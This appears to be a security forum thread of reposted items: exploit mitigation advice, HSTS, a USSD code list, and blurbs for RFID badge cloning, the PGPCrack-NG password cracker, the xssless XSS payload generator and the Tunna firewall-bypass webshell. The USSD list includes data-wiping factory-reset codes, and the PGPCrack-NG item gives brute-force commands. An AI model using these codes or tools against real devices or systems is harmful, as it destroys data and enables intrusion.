  12. Exploit Protection for Microsoft Windows By Guest Writer posted 13 Dec 2013 at 05:52AM Software exploits are an attack technique used by attackers to silently install various malware – such as Trojans or backdoors – on a user’s computer without requiring social engineering to trick the victim into manually running a malicious program. Such malware installation through an exploit would be invisible to the user and gives attackers an undeniable advantage. Exploits attempt to use vulnerabilities in particular operating system or application components in order to allow malware to execute. In our previous blog post titled Solutions to current antivirus challenges, we discussed several methods by which security companies can tackle the exploit problem. In this post, we provide more detail on the most exploited applications on Microsoft Windows platforms and advise a few steps users can (and should) take to further strengthen their defenses. Exploitation Targets The following applications are the ones most targeted by attackers through exploitation: Web browsers (Microsoft Internet Explorer, Google Chrome, Apple Safari, Mozilla Firefox and others). Plug-ins for browsers (Adobe Flash Player, Oracle Java, Microsoft Silverlight). The Windows operating system itself – notably the Win32 subsystem driver – win32k.sys. Adobe Reader and Adobe Acrobat Other specific applications Different types of exploits are used in different attack scenarios. One of the most dangerous scenarios for an everyday user is the use of exploits by attackers to remotely install code into the operating system. In such cases, we usually find that the user has visited a compromised web resource and their system has been invisibly infected by malicious code (an attack often referred to as a “drive-by download”). If your computer is running a version of software such as a web browser or browser plug-ins that are vulnerable to exploitation, the chances of your system becoming infected with malware are very high due to the lack of mitigation from the software vendor. In the case of specific targeted attacks or attacks like a “watering hole” attack, when the attacker plants the exploit code on websites visited by the victim, the culprit can use zero-day (0-day) vulnerabilities in software or the operating system. Zero-day vulnerabilities are those that have not been patched by the vendor at the time they are being exploited by attackers. Another common technique used in targeted attacks is to send the victim a PDF document “equipped” with an exploit. Social engineering is also often used, for example by selecting a filename and document content in such a way that the victim is likely to open it. While PDFs are first and foremost document files, Adobe has extended the file format to maximize its data exchange functionality by allowing scripting and the embedding of various objects into files, and this can be exploited by an attacker. While most PDF files are safe, some can be dangerous, especially if obtained from unreliable sources. When such a document is opened in a vulnerable PDF reader, the exploit code triggers the malicious payload (such as installation of a backdoor) and a decoy document is often opened. Another target which attackers really love is Adobe Flash Player, as this plug-in is used for playback of content on all the different browsers. Like other software from Adobe, Flash Player is updated regularly as advised by the company’s updates (see Adobe Security Bulletins). Most of these vulnerabilities are of the Remote Code Execution (RCE) type and this indicates that the attackers could use such a vulnerability for remotely executing malicious code on a victim’s computer. In relation to the browser and operating system, Java is a virtual machine (or runtime environment JRE) able to execute Java applications. Java applications are platform-independent, making Java a very popular tool to use. Today Java is used by more than three billion devices. As with other browser plug-ins, misusing the Java plug-in is attractive to attackers, and given our previous experience of the malicious actions and vulnerabilities with which it is associated, we can say that as browser plug-ins go, Java represents one of the most dangerous components. Also, various components of the Windows operating system itself can be used by attackers to remotely execute code or elevate privileges. The figure below shows the number of patches various Windows components have received during 2013 (up until November). Chart 1: Number of patches per component The “Others” category includes vulnerabilities which were fixed for various Operating System components (CSRSS, SCM, GDI, Print Spooler, XML Core Services, OLE, NFS, Silverlight, Remote Desktop Client, Active Directory, RPC, Exchange Server). This ranking shows that Internet Explorer fixed the largest number of vulnerabilities, more than a hundred vulnerabilities having been fixed in the course of fourteen updates. Seven of the vulnerabilities had the status ‘is-being-exploited-in-the-wild at the time of patching’: that is, they were being actively exploited by attackers. The second most-patched component of the operating system is the infamous Windows subsystem driver win32k.sys. Vulnerabilities in this driver are used by attackers to escalate privileges on the system, for example, to bypass restrictions imposed by User Account Control (UAC), a least-privilege mechanism introduced by Microsoft in Windows Vista to reduce the risk of compromise by an attack that requires administrator privileges. Mitigation techniques We now look in more detail at the most exploited applications and provide some steps that you can (and should) take to mitigate attacks and further strengthen your defenses. Windows Operating System Modern versions of Microsoft Windows – i.e., Windows7, 8, and 8.1 at time of writing – have built-in mechanisms which can help to protect user from destructive actions delivered by exploits. Such features became available starting with Windows Vista and were upgraded in the most recent operating system versions. These features include: DEP (Data Execution Prevention) & ASLR (Address Space Layout Randomization) mechanisms introduce an extra layer of complication when attempting to exploit vulnerabilities in applications and the operating system. This is due to special restrictions on the use of memory which should not be used to execute code, and the placement of program modules into memory at random addresses. UAC (User Account Control) has been upgraded from Windows 7 onward and requires confirmation from the user before programs can be run that need to change system settings and create files in system directories. SmartScreen Filter helps to prevent the downloading of malicious software from the Internet based on the file’s reputation: files known to be malicious or not recognized by the filter are blocked. Originally it was a part of Internet Explorer, but with the release of Windows 8 it was built into the operating system so it now works with all browsers. Special “Enhanced Protected Mode” for Internet Explorer (starting from IE10): on Windows 8 this mode allows the browser’s tabs to be run in the context of isolated processes, which are prevented from performing certain actions (a technique also known as sandboxing). For Windows 7 x64 (64-bit) this feature allows IE to run tabs as separate 64-bit processes, which help to mitigate the common heap-spray method of shellcode distribution. For more information, refer to the MSDN blog (here and here). PDF files In view of the high risks posed by the use PDF documents from unsafe sources, and given the low awareness of many users and their reluctance to protect themselves adequately, modern versions of Adobe Reader have a special “Protected Mode” (also referred to as sandboxing) for viewing documents. When using this mode, code from the PDF file is prevented from executing certain potentially dangerous functions. Figure 2: “Sandbox” mode options for Adobe Reader can be enabled through Edit -> Preferences -> Security (Enhanced). By default, Protected Mode is turned off. Despite the active option Enable Protected Mode at startup, sandbox mode stays turned off because Protected Mode setting is set to “Disabled” status. Accordingly, after installation it is strongly recommended that you turn on this setting to apply to “Files From Potentially Unsafe Locations” or, even better, “All files”. Please note that when you turn on protected view, Adobe Reader disables several features which can be used in PDF files. Therefore, when you open the file, you may receive a tooltip alert advising you that protected mode is active. Figure 3: Tooltip which indicates active protected mode. If you are sure about the origin and safety of the file, you can activate all of its functions by pressing the appropriate button. Adobe Flash Player Adobe, together with the manufacturers of web browsers, has made available special features and protective mechanisms to defend against exploits that target the Flash Player plug-in. Browsers such as Microsoft Internet Explorer (starting with version 10 on Windows 8.0 and later), Google Chrome and Apple Safari (latest version) launch the Flash Player in the context of specially-restricted (i.e. sandboxed) process, limiting the ability of this process to access many system resources and places in the file system, and also to limit how it communicates with the network. Timely update of the Flash Player plug-in for your browser is very important. Google Chrome and Internet Explorer 10+ are automatically updated with the release of new versions of Flash Player. To check your version of the Adobe Flash Player you can use this official Adobe resource. In addition, most browsers support the ability to completely disable the Flash Player plug-in, so as to prohibit the browser from playing such content. Internet Browsers At the beginning of this article we already mentioned that attackers often rely on delivering malicious code using remote code execution through the browser (drive-by downloads). Regardless of what browser plug-ins are installed, the browser itself may contain a number of vulnerabilities known to the attacker (and possibly not known to the browser vendor). If the vulnerability has been patched by the developer and an update for it is available, the user can install it and without worrying that it will be used to compromise the operating system. On the other hand, if the attackers are using a previously unknown vulnerability, in other words one that has not yet been patched (zero-day), the situation is more complicated for the user. Modern browsers and operating systems incorporate special technologies for isolating application processes, thus creating special restrictions on performing various actions, which the browser should not be able to perform. In general, this technique is called sandboxing and it allows users to limit what a process can do. One example of this isolation is the fact that modern browsers (for example, Google Chrome and Internet Explorer) execute tabs as separate processes in the operating system, thus allowing restricted permissions for executing certain actions in a specific tab as well as maintaining the stability of the browser. If one of the tabs hangs, the user can terminate it without terminating other tabs. In modern versions of Microsoft’s Internet Explorer browser (IE10 and IE11) there is a special sandboxing technology, which is called “Enhanced Protected Mode” (EPM). This mode allows you to restrict the activity of a process tab or plug-in and thus make exploitation much more difficult for attackers. Figure 4: Enhanced Protected Mode option turned on in Internet Explorer settings (available since IE10). On Windows 8+ (IE11) it was turned on by default before applying MS13-088. EPM has been upgraded for Windows 8. If you are using EPM in Windows 7 x64, then this feature will cause that browser tabs are run as 64-bit processes (on a 64-bit OS Internet Explorer runs its tabs as 32-bit processes by default). Note that by default EPM is off. Figure 5. Demonstration of EPM at work on Windows 7 x64 [using Microsoft Process Explorer]. With this option turned on, the processes of browser tabs work as 64-bit, making them difficult to use for malicious code installation (or at least harder for heap-spraying attacks). Starting with Windows 8, Enhanced Protected Mode has been expanded in order to isolate (sandbox) a process’s actions at the operating system level. This technology is called “AppContainer” and allows the maximum possible benefit from the use of the EPM option. Internet Explorer tab processes with the EPM option active work in AppContainer mode. In addition, Windows 8 EPM mode is enabled by default (IE11). Figure 6. EPM implementation in Windows 8. In Windows 7 x64 EPM uses 64-bit processes for IE tabs for mitigation, instead of AppContainer. Note that before November Patch Tuesday 2013, which includes MS13-088 update (Cumulative Security Update for Internet Explorer: November 12, 2013) Microsoft supported EPM as default setting for IE11 on Windows 8+. But this update disables EPM for IE11 as default setting. So, now if you reset advanced IE settings («Restore advanced settings» option) to ‘initial state’, EPM will turn off by default. Google Chrome, like Internet Explorer, has special features to mitigate drive-by download attacks. But unlike Internet Explorer, sandboxing mode for Chrome is always active and requires no additional action by the user to launch it. This feature of Chrome means that tab processes work with restricted privileges, which does not allow them to perform various system actions. Figure 7: Sandboxing mode as implemented in Google Chrome. Notice that almost all of the user’s SID groups in the access token have the “Deny” status, restricting access to the system. Additional information can be found on MSDN. In addition to this mode, Google Chrome is able to block malicious URL-addresses or websites which have been blacklisted by Google because of malicious actions (Google Safe Browsing). This feature is similar to Internet Explorer’s SmartScreen. Figure 8: Google Safe Browsing in Google Chrome blocking a suspicious webpage. When you use Java on Windows, its security settings can be changed using the control panel applet. In addition, the latest version contains security settings which allow you to configure the environment more precisely, allowing only trusted applications to run. Figure 9: Options for updating Java. To completely disable Java in all browsers used in the system, remove the option “Enable Java content in the browser” in Java settings. Figure 10: Java setting to disable its use in all browsers. EMET Microsoft has released a free tool for users to help protect the operating system from malicious actions used in exploits. Figure 11: EMET interface. The Enhanced Mitigation Experience Toolkit (EMET) uses preventive methods to block various actions typical of exploits and to protect applications from attacks. Despite the fact that Windows 7 and Windows 8 have built-in options for DEP and ASLR, which are enabled by default and intended to mitigate the effects of exploitation, EMET allows the introduction of new features for blocking the action of exploits and enable DEP or ASLR for specified processes (increasing system protection in older versions of the OS). This tool must be configured separately for each application: in other words, to protect an application using this tool, you need to include that specific application in the list. In addition there is a list of applications for which EMET is enabled by default: for example, the browser Internet Explorer, Java and Microsoft Office. It’s a good idea to add to the list your favorite browser and Skype. Operating System Updates Keeping your operating system and installed software promptly updated and patched is good practice because vendors regularly use patches and updates to address emerging vulnerabilities. Note that Windows 7 and 8 have the ability to automatically deliver updates to the user by default. You can also check for updates through the Windows Control Panel as shown below. Figure 12: Windows Update Generic Exploit Blocking So far, we have looked at blocking exploits that are specific to the operating system or the applications you are using. You may also want to look at blocking exploits in general. You may be able to turn to your security software for this. For example, ESET introduced something called the Exploit Blocker in its seventh generation of security products with its anti-malware programs ESET Smart Security and ESET NOD32 Antivirus. The Exploit Blocker is a proactive mechanism that works by analyzing suspicious program behavior and generically detecting signs of exploitation, regardless of the specific vulnerability that was used. Figure 1: ESET Exploit Blocker option turned on in HIPS settings. Conclusion Any operating system or program which is widely used will be studied by attackers for vulnerabilities to exploit for illicit purposes and financial gain. As we have shown above, Adobe, Google and Microsoft have taken steps to make these types of attacks against their software more difficult. However, no single protection technique can be 100% effective against determined adversaries, and users have to remain vigilant about patching their operating systems and applications. Since some vendors update their software on a monthly basis, or even less frequently, it is important to use (and keep updated) anti-malware software which blocks exploits. This article was contributed by: Artem Baranov, Lead Virus Analyst for ESET’s Russian distributor. Author Guest Writer, We Live Security Sursa: Exploit Protection for Microsoft Windows
  13. HSTS – The missing link in Transport Layer Security Posted on November 30, 2013 by Scott Helme HTTP Strict Transport Security (HSTS) is a policy mechanism that allows a web server to enforce the use of TLS in a compliant User Agent (UA), such as a web browser. HSTS allows for a more effective implementation of TLS by ensuring all communication takes place over a secure transport layer on the client side. Most notably HSTS mitigates variants of man in the middle (MiTM) attacks where TLS can be stripped out of communications with a server, leaving a user vulnerable to further risk. Introduction In a previous blog I demonstrated using SSLstrip to MiTM SSL and the dangers it posed. Once installed as a MiTM, SSLstrip will connect to a server on behalf of the victim and communicate using HTTPS. The server is satisfied with the secure communication to the attacker who then transparently forwards all data to the victim using HTTP. This is possible because the victim does not enforce the use of TLS and either typed in twitter.com and the browser defaulted to http://, or they were using a bookmark or link that contained http://. Once Twitter receives the request it issues a redirect back to the victim’s browser pointing to the https:// URL. Because all of this is done using HTTP the communications are vulnerable to be intercepted and modified by SSLstrip. Crucially, the user receives no warnings during the attack and can’t verify if they should be using https://. HSTS mitigates this threat by providing an option to enforce the use of TLS by the browser, which would prevent the user navigating to the site using http://. Implementing HSTS In order to implement HSTS a host must declare to a UA that it is a HSTS Host by issuing a HSTS Policy. This is done with the addition of the HTTP response header ‘Strict-Transport-Security: max-age=31536000‘. The max-age directive is required and can be any value from 0 upwards, which is the number of seconds after receiving the policy that the UA is to treat the host issuing it as a HSTS Host. It’s worth noting that a max-age directive value of 0 informs the UA to cease treating the host that issued it as a HSTS Host and to remove all policy. It does not imply an infinite max-age directive value. There is also an optional includeSubDomains directive that can be included at the discretion of the host such as ‘Strict-Transport-Security: max-age=31536000; includeSubDomains‘. This would, as expected, inform the UA that all subdomains are to be treated as HSTS Hosts also. Twitter’s HSTS Policy The HSTS response header should only be sent over a secure transport layer but UAs should ignore this header if received over HTTP. This is primarily because an attacker running a MiTM attack could maliciously strip out or inject this header into a HTTP response causing undesired behaviour. This however does present a very slim window of opportunity for an attacker in a targeted attack. Upon a user’s very first interaction with Twitter, the browser will have no knowledge of a HSTS Policy for the host. This will result in the first communication taking place over HTTP and not HTTPS. Once Twitter receives the request and replies with a redirect to a HTTPS version of the site, still using HTTP, an attacker could simply effect a MiTM attack against the victim as they would before. The viability of this form of attack however has, overall, been tremendously reduced. The only opportunity the attacker now has, is to be setup and prepared to intercept the very first communication ever with the host, or, wait until the HSTS policy expires after the victim has had no further communication with the host for the duration of the max-age directive. HSTS Header sent via HTTPS No HSTS Header sent via HTTP Once the user has initiated communications with a host that declares a valid HSTS Policy the UA will consider the host to be a HSTS Host for the duration of max-age and store the policy. During this time the UA will afford the user the following protections. 1. UAs transform insecure URI references to an HSTS Host into secure URI references before dereferencing them. 2. The UA terminates any secure transport connection attempts upon any and all secure transport errors or warnings. source Point 1 means that once Twitter has been accepted by the UA as a HSTS Host that the UA will replace any reference to http:// with https:// where the host is twitter.com (and it’s subdomains if specified) before it sends the request. This includes links found on any webpage that use http://, short cuts or bookmarks that may specify http:// and even user input such as the address bar. Even if http:// is explicitly defined as the protocol of choice the UA will enforce https://. Point 2 is also fairly important, if not as important as point 1. By terminating the connection as soon as a warning or error message is triggered the UA will prevent the user from clicking through them. This commonly happens when the user does not understand what the message is saying or because they are not concerned about the security of the connection. Many attacks are dependent on the poor manner in which users are informed of potential risk and the poor response from users to this warning. By simply terminating the connection when there is cause for any uncertainty provides the highest possible level of protection to the user. It even stops you accidentally clicking through an error message! So, once a user has a valid HSTS Policy in place, their request to http://twitter.com should go from something like this: Initial request uses HTTP with no HSTS policy enforced To something like this instead: All requests use HTTPS when HSTS is enforced This can also be verified using the Chrome Developer Tools. Open a new tab, click the Chrome Menu in the top right then select Tools -> Developer Tools and open the network tab. Now navigate to http://twitter.com (you must have visited the site before). You can see the initial request that would have gone to http://twitter.com is not sent and the browser immediately replaces that with a request to https://twitter.com instead. Request using HTTP is not sent HTTP request replaced with HTTPS equivalent HSTS In Practise Whilst not yet being widely deployed HSTS has started to make a more widespread appearance since the specification was published in Nov 2012. Below you can see that both Twitter and Facebook have the HSTS response header set, though Facebook doesn’t appear to have a very long max-age value. Twitter: Facebook: Out of interest I decided to check a selection of websites for high street banks and see if any had yet implemented a HSTS Policy. Having checked Barlcays, Halifax, HSBC, Nationwide, Natwest, RBS, Santander and Yorkshire Bank I was disappointed to find that none had yet implemented a HSTS Policy and some of them even have a dedicated online banking domain name. Preloaded HSTS It is also possible for a browser to ship with a preloaded list of HSTS Hosts. The Chrome and Firefox browsers both feature a built in list of sites that will always be treated as HSTS Hosts regardless of the presence of the HSTS response header. Websites can opt in to be included in the list of preloaded hosts and you can view the Chromium Source to see all the hosts already included. For sites preloaded in the browser there is no state where communications will take place that do not travel on a secure transport layer. Be that the initial communication, the first communication after wiping the local cache or any communication after a policy would have expired, the user cannot exchange data using HTTP. The browser will afford the protection of HSTS for the applicable hosts at all times. Unfortunately this solution isn’t really scalable considering the sheer potential for the number of sites that could be included. That said, if all financial institutions, government sites, social networks and any other potentially large target applied to be included, they could mitigate a substantial amount of risk. Conclusion HSTS has been a highly anticipated and a much needed solution to the problems of HTTP being the default protocol for a UA and the lack of an ability for a host to reliably enforce secure communications. For any site that issues permanent redirects to HTTPS the addition of the HSTS response header is a much safer way of enforcing secure communications for compliant UAs. By preventing the UA from sending even the very first request via HTTP, HSTS removes the only opportunity a MiTM has to gain a foothold in a secure transport layer. Scott. Short URL: http://scotthel.me/hsts Sursa: https://scotthelme.co.uk/hsts-the-missing-link-in-tls/
  14. [REF] List of USSD codes! by kevhuff Thought I would compile a list of USSD codes for everyones reference. I have tested most if anybody has any to add please feel free. ****Warning some of these codes can be harmful( wipe data and ect.) I am not responsible for anything you do to your device**** Some of these codes may lead you to a menu use the option key (far left soft key) to navigate Some of the functions may be locked to our use but im still working on how to use these menus more extensively Information *#44336# Software Version Info *#1234# View SW Version PDA, CSC, MODEM *#12580*369# SW & HW Info *#197328640# Service Mode *#06# = IMEI Number. *#1234# = Firmware Version. *#2222# = H/W Version. *#8999*8376263# = All Versions Together. *#272*imei#* Product code *#*#3264#*#*- RAM version *#92782# = Phone Model *#*#9999#*#*= Phone/pda/csc info Testing *#07# Test History *#232339# WLAN Test Mode *#232331# Bluetooth Test Mode *#*#232331#*#*- Bluetooth test *#0842# Vibration Motor Test Mode *#0782# Real Time Clock Test *#0228# ADC Reading *#32489# (Ciphering Info) *#232337# Bluetooth Address *#0673# Audio Test Mode *#0*# General Test Mode *#3214789650# LBS Test Mode *#0289# Melody Test Mode *#0589# Light Sensor Test Mode *#0588# Proximity Sensor Test Mode *#7353# Quick Test Menu *#8999*8378# = Test Menu. *#*#0588#*#*- Proximity sensor test *#*#2664#*#*- Touch screen test *#*#0842#*#*- Vibration test* Network *7465625*638*# Configure Network Lock MCC/MNC #7465625*638*# Insert Network Lock Keycode *7465625*782*# Configure Network Lock NSP #7465625*782*# Insert Partitial Network Lock Keycode *7465625*77*# Insert Network Lock Keycode SP #7465625*77*# Insert Operator Lock Keycode *7465625*27*# Insert Network Lock Keycode NSP/CP #7465625*27*# Insert Content Provider Keycode *#7465625# View Phone Lock Status *#232338# WLAN MAC Address *#526# WLAN Engineering Mode -runs wlan tests (same as below) *#528# WLAN Engineering Mode *#2263# RF Band Selection-not sure about this one appears to be locked *#301279# HSDPA/HSUPA Control Menu---change HSDPA classes (opt. 1-5) Tools/Misc. *#*#1111#*#*- Service Mode #273283*255*663282*# Data Create SD Card *#4777*8665# = GPSR Tool. *#4238378# GCF Configuration *#1575# GPS Control Menu *#9090# Diagnostic Configuration *#7284# USB I2C Mode Control—mount to usb for storage/modem *#872564# USB Logging Control *#9900# System dump mode- can dump logs for debugging *#34971539# Camera Firmware Update *#7412365# Camera Firmware Menu *#273283*255*3282*# Data Create Menu- change sms, mms, voice, contact limits *2767*4387264636# Sellout SMS / PCODE view *#3282*727336*# Data Usage Status *#*#8255#*#*- Show GTalk service monitor-great source of info *#3214789# GCF Mode Status *#0283# Audio Loopback Control #7594# Remap Shutdown to End Call TSK *#272886# Auto Answer Selection ****SYSTEM*** USE CAUTION *#7780# Factory Reset *2767*3855# Full Factory Reset *#*#7780#*#* Factory data reset *#745# RIL Dump Menu *#746# Debug Dump Menu *#9900# System Dump Mode *#8736364# OTA Update Menu *#2663# TSP / TSK firmware update *#03# NAND Flash S/N BAM!!!! Sursa: [REF] List of USSD codes! [updated 10-30] - xda-developers
  15. Defcon 21 - Rfid Hacking: Live Free Or Rfid Hard Description: Have you ever attended an RFID hacking presentation and walked away with more questions than answers? This talk will finally provide practical guidance on how RFID proximity badge systems work. We'll cover what you'll need to build out your own RFID physical penetration toolkit, and how to easily use an Arduino microcontroller to weaponize commercial RFID badge readers — turning them into custom, long-range RFID hacking tools. This presentation will NOT weigh you down with theoretical details, discussions of radio frequencies and modulation schemes, or talk of inductive coupling. It WILL serve as a practical guide for penetration testers to understand the attack tools and techniques available to them for stealing and using RFID proximity badge information to gain unauthorized access to buildings and other secure areas. Schematics and Arduino code will be released, and 100 lucky audience members will receive a custom PCB they can insert into almost any commercial RFID reader to steal badge info and conveniently save it to a text file on a microSD card for later use (such as badge cloning). This solution will allow you to read cards from up to 3 feet away, a significant improvement over the few centimeter range of common RFID hacking tools. Some of the topics we will explore are: Overview of best RFID hacking tools available to get for your toolkit Stealing RFID proximity badge info from unsuspecting passers-by Replaying RFID badge info and creating fake cloned cards Brute-forcing higher privileged badge numbers to gain data center access Attacking badge readers and controllers directly Planting PwnPlugs, Raspberry Pis, and similar devices as physical backdoors to maintain internal network access Creating custom RFID hacking tools using the Arduino Defending yourself from RFID hacking threats This DEMO-rich presentation will benefit both newcomers and seasoned professionals of the physical penetration testing field. Francis Brown (@security_snacks) CISA, CISSP, MCSE, is a Managing Partner at Bishop Fox (formerly Stach & Liu), a security consulting firm providing IT security services to the Fortune 1000 and global financial institutions as well as U.S. and foreign governments. Before joining Bishop Fox, Francis served as an IT Security Specialist with the Global Risk Assessment team of Honeywell International where he performed network and application penetration testing, product security evaluations, incident response, and risk assessments of critical infrastructure. Prior to that, Francis was a consultant with the Ernst & Young Advanced Security Centers and conducted network, application, wireless, and remote access penetration tests for Fortune 500 clients. Francis has presented his research at leading conferences such as Black Hat USA, DEF CON, RSA, InfoSec World, ToorCon, and HackCon and has been cited in numerous industry and academic publications. Francis holds a Bachelor of Science and Engineering from the University of Pennsylvania with a major in Computer Science and Engineering and a minor in Psychology. While at Penn, Francis taught operating system implementation, C programming, and participated in DARPA-funded research into advanced intrusion prevention system techniques. https://www.facebook.com/BishopFoxConsulting https://twitter.com/security_snacks For More Information please visit : - https://www.defcon.org/html/defcon-21/dc-21-speakers.html Sursa: Defcon 21 - Rfid Hacking: Live Free Or Rfid Hard
  16. PGPCrack-NG PGPCrack-NG is a program designed to brute-force symmetrically encrypted PGP files. It is a replacment for the long dead PGPCrack. PGPCrack-NG is a program designed to brute-force symmetrically encrypted PGP files. On Fedora 19, do sudo yum install libassuan-devel -y. On Ubuntu, do sudo apt-get libpth-dev libbz2-dev libassuan-dev. Compile using make. You might need to edit -I/usr/include/libassuan2 part in the Makefile. Run cat ~/magnum-jumbo/run/password.lst | ./PGPCrack-NG <PGP file> john -i -stdout | ./PGPCrack-NG <PGP file> Speed: > 1330 passwords / second on AMD X3 720 CPU @ 2.8GHz (using single core). Sursa si download: https://github.com/kholia/PGPCrack-NG
  17. xssless – Automatic XSS Payload Generator After working with more and more complex Javascript payloads for XSS I realized that most of the work I was doing was unnecessary! I scraped together some snippets from my Metafidv2 project and created “xssless”, an automated XSS payload generator. This tool is sure to save some time on more complex sites that make use of tons of CSRF tokens and other annoying tricks. Psst! If you already understand all of this stuff and don’t want to read this post click here for the github link. The XSS Vulnerability Once you have your initial XSS vulnerability found you’re basically there! Now you can do evil things like session hijacking and much more! But wait, what if the site is extra secure and locks you out if you use the same session token from a different IP address? Does this mean your newly found XSS is useless? Of course not! XSS Worms & JavaScript Payloads Remember, if you can execute JavaScript in the user’s browser you can do anything the user’s browser can do. This means as long as you’re obeying same-domain, you’re good to go! How? JavaScript payloads of course! Not only are JavaScript payloads real, they are quite dangerous – people often write-up XSS as being a ‘low priority’ issue in security. This is simply not true, I have to imagine this comes from a lack of amazement at the casual JavaScript popup alerts with session cookies as the message. Less we forget how powerful the Samy Worm was, propagating to over a million accounts and running MySpace’s servers into the ground. This was one of the first big displays of just how powerful XSS could be. Building Complex Payloads Building payloads can be a real pain, custom coding every POST/GET request and parsing CSRF tokens all while debugging to ensure it works. After building a rather complex payload I realized this is pointless, why couldn’t a script do the same? xssless Work hard not smart, using xssless you can automatically generate payloads for any site quickly and efficiently. xssless generates payloads from Burp proxy exported requests, meaning you do your web actions in the browser though Burp and then export them into xssless. An Example Scenario Image if we had an XSS in reddit.com, of course we want to use this cool new exploit (because we lack morality and this is an example so bite me). We fire up Burp and set Firefox to use it as a proxy, now we just preform the web action we want to make a payload for. ... Click Here for the Github Page Sursa: xssless - Automatic XSS Payload Generator | The Hacker Blog
  18. Nytro

    Fun stuff

  19. Nytro

    Tunna

    Overview Tunna is a tool designed to bypass firewall restrictions on remote webservers. It consists of a local application (supporting Ruby and Python) and a web application (supporting ASP.NET, Java and PHP). Description Tunna is a set of tools which will wrap and tunnel any TCP communication over HTTP. It can be used to bypass network restrictions in fully firewalled environments. The web application file must be uploaded on the remote server. It will be used to make a local connection with services running on the remote web server or any other server in the DMZ. The local application communicates with the webshell over the HTTP protocol. It also exposes a local port for the client application to connect to. Since all external communication is done over HTTP it is possible to bypass the filtering rules and connect to any service behind the firewall using the webserver on the other end. Tunna framework Tunna framework comes witht he following functionality: [TABLE=width: 90%, align: center] [TR] [TD][/TD] [TD=class: txt12]Ruby client - proxy bind: Ruby client proxy to perform the tunnel to the remote web application and tunnel TCP traffic.[/TD] [/TR] [TR] [TD][/TD] [TD=class: txt12]Python client - proxy bind: Python client proxy to perform the tunnel to the remote web application and tunnel TCP traffic.[/TD] [/TR] [TR] [TD][/TD] [TD=class: txt12]Metasploit integration module, which allows transparent execution of metasploit payloads on the server[/TD] [/TR] [TR] [TD][/TD] [TD=class: txt12]ASP.NET remote script[/TD] [/TR] [TR] [TD][/TD] [TD=class: txt12]Java remote script[/TD] [/TR] [TR] [TD][/TD] [TD=class: txt12]PHP remote script[/TD] [/TR] [/TABLE] Author Tunna has been developed by Nikos Vassakis. Download: http://www.secforce.com/research/tunna_download.html Sursa: SECFORCE :: Penetration Testing :: Research
  20. [h=1]The Pirate Bay's Guyana Domain Goes Down[/h]December 19th, 2013, 08:31 GMT · By Gabriela Vatu - The Pirate Bay's new domain is no longer working The Pirate Bay has been on the run from domain to domain, changing quite a few over the past week. Only yesterday, the site left Peru and moved to the Republic of Guyana. Now, thepiratebay.gy is no longer working, although it’s uncertain if the domain was seized and the site has moved on to another location or there’s an issue with the servers. The site’s insiders said that the easiest way to access the Pirate Bay would be via its old domains over at .SE and .ORG, which would redirect users to the newest homepage, wherever that might be. However, this doesn’t seem to be working either for now. The site’s admins said yesterday that they already had a bunch of domains set up in case they needed to leave again, mentioning that there were about 70 more domains to choose from. Last week, Pirate Bay lost its .SX domain. From there, it moved to Ascension Island’s .AC for about a day, before going to the Peruvian domain. Yesterday, the site had to relocate to .GY. As soon as the site settles for a new domain, the blog will be updated, so check back soon. [uPDATE] The Pirate Bay site seems to be working on the Swedish .SE domain for now, but it looks like it's impossible to download any magnet links at the moment. Most likely, the torrent site is only passing through as it seeks to settle into a new domain. Sursa: The Pirate Bay's Guyana Domain Goes Down [uPDATE]
  21. Research shows how MacBook Webcams can spy on their users without warning By Ashkan Soltani and Timothy B. Lee December 18 at 2:25 pm The woman was shocked when she received two nude photos of herself by e-mail. The photos had been taken over a period of several months — without her knowledge — by the built-in camera on her laptop. Fortunately, the FBI was able to identify a suspect: her high school classmate, a man named Jared Abrahams. The FBI says it found software on Abrahams’s computer that allowed him to spy remotely on her and numerous other women. Abrahams pleaded guilty to extortion in October. The woman, identified in court papers only as C.W., later identified herself on Twitter as Miss Teen USA Cassidy Wolf. While her case was instant fodder for celebrity gossip sites, it left a serious issue unresolved. Most laptops with built-in cameras have an important privacy feature — a light that is supposed to turn on any time the camera is in use. But Wolf says she never saw the light on her laptop go on. As a result, she had no idea she was under surveillance. That wasn’t supposed to be possible. While controlling a camera remotely has long been a source of concern to privacy advocates, conventional wisdom said there was at least no way to deactivate the warning light. New evidence indicates otherwise. Marcus Thomas, former assistant director of the FBI’s Operational Technology Division in Quantico, said in a recent story in The Washington Post that the FBI has been able to covertly activate a computer’s camera — without triggering the light that lets users know it is recording — for several years. Now research from Johns Hopkins University provides the first public confirmation that it’s possible to do just that, and demonstrates how. While the research focused on MacBook and iMac models released before 2008, the authors say similar techniques could work on more recent computers from a wide variety of vendors. In other words, if a laptop has a built-in camera, it’s possible someone — whether the federal government or a malicious 19 year old — could access it to spy on the user at any time. One laptop, many chips The built-in cameras on Apple computers were designed to prevent this, says Stephen Checkoway, a computer science professor at Johns Hopkins and a co-author of the study. “Apple went to some amount of effort to make sure that the LED would turn on whenever the camera was taking images,” Checkoway says. The 2008-era Apple products they studied had a “hardware interlock” between the camera and the light to ensure that the camera couldn’t turn on without alerting its owner. The cameras Brocker and Checkoway studied. (Matthew Brocker and Stephen Checkoway) But Checkoway and his co-author, Johns Hopkins graduate student Matthew Brocker, were able to get around this security feature. That’s because a modern laptop is actually several different computers in one package. “There’s more than one chip on your computer,” says Charlie Miller, a security expert at Twitter. “There’s a chip in the battery, a chip in the keyboard, a chip in the camera.” MacBooks are designed to prevent software running on the MacBook’s central processing unit (CPU) from activating its iSight camera without turning on the light. But researchers figured out how to reprogram the chip inside the camera, known as a micro-controller, to defeat this security feature. In a paper called “iSeeYou: Disabling the MacBook Webcam Indicator LED,” Brocker and Checkoway describe how to reprogram the iSight camera’s micro-controller to allow the camera and light to be activated independently. That allows the camera to be turned on while the light stays off. Their research is under consideration for an upcoming academic security conference. The researchers also provided us with a copy of their proof-of-concept software. In the video below, we demonstrate how the camera can be activated without triggering the telltale warning light. Attacks that exploit microcontrollers are becoming more common. “People are starting to think about what happens when you can reprogram each of those,” Miller says. For example, he demonstrated an attack last year on the software that controls Apple batteries, which causes the battery to discharge rapidly, potentially leading to a fire or explosion. Another researcher was able to convert the built-in Apple keyboard into spyware using a similar method. According to the researchers, the vulnerability they discovered affects “Apple internal iSight webcams found in earlier-generation Apple products, including the iMac G5 and early Intel-based iMacs, MacBooks, and MacBook Pros until roughly 2008.” While the attack outlined in the paper is limited to these devices, researchers like Charlie Miller suggest that the attack could be applicable to newer systems as well. “There’s no reason you can’t do it -- it’s just a lot of work and resources but it depends on how well [Apple] secured the hardware,” Miller says. Apple did not reply to requests for comment. 